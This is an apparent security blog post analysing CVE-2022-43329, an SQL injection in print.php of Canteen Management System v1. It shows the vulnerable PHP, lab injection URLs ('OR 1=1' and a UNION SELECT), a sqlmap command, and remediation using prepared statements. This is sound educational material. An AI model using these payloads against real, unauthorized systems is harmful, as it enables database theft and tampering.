CVE-2022-43329 - SQL Injection Vulnerability in Canteen Management System v1. (`/print.php?id=` Exploit Guide and Analysis)

The digital transformation of basic services like canteens is a huge leap forward for schools, businesses, and other organizations. But just like any other web app, canteen management systems can be vulnerable to cyber-attacks if security isn’t properly considered during development. One particularly concerning issue is SQL injection, which allows attackers to manipulate the web application’s database through malicious user input.

In this article, we’ll take a deep dive into CVE-2022-43329, a security flaw found in Canteen Management System v1. that exposes data and threatens database integrity via the id parameter in print.php. We’ll break down the vulnerability, show a proof of concept, and discuss remediation steps.

What is CVE-2022-43329?

CVE-2022-43329 is a tracked vulnerability assigned by MITRE. It affects the Canteen Management System v1. (the “CMS” for short), allowing unauthorized users to potentially:

Manipulate or erase records

The root cause is insufficient sanitization of user input—more specifically, the id parameter in the script /print.php does not validate input before passing it directly to a SQL query.

How the Vulnerability Works

Most web apps use databases to store and retrieve data dynamically. When a user requests something like /print.php?id=10, the number 10 is fetched from the URL and then plugged directly into a SQL query, such as:

$id = $_GET['id'];
$query = "SELECT * FROM orders WHERE id = $id";
// runs the query and displays the results

A malicious actor can modify the URL to include crafted input, like so

/print.php?id=10 OR 1=1

This changes the query logic to

SELECT * FROM orders WHERE id = 10 OR 1=1

Because 1=1 is always true, the query returns all orders, not just the one with ID 10.

If the attacker injects more complex SQL, they can extract credentials, add or delete records, and perform other dangerous operations.

Setting up the Lab

Note: Perform these actions only in legal, isolated environments. Never test on production systems without authorization.

To demonstrate, download and install Canteen Management System v1. on a local web server (e.g., XAMPP, WAMP, or LAMP).

Set up a MySQL database as per the documentation.

- Browse to /print.php?id=1 to view typical behavior.

Injecting SQL in the id parameter

http://localhost/canteen/print.php?id=1 OR 1=1

This reveals all records (or as many as the page will render).

You can extract information using the following URL

http://localhost/canteen/print.php?id=1 UNION SELECT 1,@@version,3--

If the page is vulnerable, you'll see the MySQL version presented in one of the table columns.

3. Full SQLMap Example

SQLMap is a popular tool to automate SQL injection discovery and exploitation.

Run:

sqlmap -u "http://localhost/canteen/print.php?id=1" --dbs

SQLMap will attempt various payloads and display available database names if the system is vulnerable.

Sensitive Data Exposure: Attackers can steal user info, transaction records, and credentials.

- Privilege Escalation: If the web server’s database user has high privileges, attackers can deploy further exploits (even backdoors).
- Database Tampering: Modify, delete, or insert arbitrary records, affecting billing or user balances.

Switch from dynamic SQL to prepared statements. In PHP/MySQLi, for example

$stmt = $conn->prepare("SELECT * FROM orders WHERE id = ?");
$stmt->bind_param("i", $_GET['id']);
$stmt->execute();

Explicitly check that id is numeric

if (!is_numeric($_GET['id'])) {
    die("Invalid ID value!");
}

3. Least Privilege

Ensure the DB user used by the app has read/write access only to the required tables.

4. Regular Security Audits

Employ tools like SQLMap or Burp Suite to test endpoints for SQL injection.

References & Resources

- Official CVE Details for CVE-2022-43329
- Sourcecodester Canteen Management System v1.
- OWASP Top 10: Injection
- SQLMap Automated SQL Injection Tool

Conclusion

CVE-2022-43329 highlights why web developers must pay attention to secure coding practices. Even useful tools for everyday operations, like a Canteen Management System, can put sensitive data at risk if they don’t properly sanitize user input and use secure database access methods.

If you are using Canteen Management System v1. (or any software with similar design), audit your code, patch vulnerable endpoints, and keep your users safe from such critical vulnerabilities.


*Did you find this post useful? Share and follow for more exclusive security breakdowns and practical remediation tips for open-source web applications!*

Timeline

Published on: 11/01/2022 19:15:00 UTC
Last modified on: 11/01/2022 22:37:00 UTC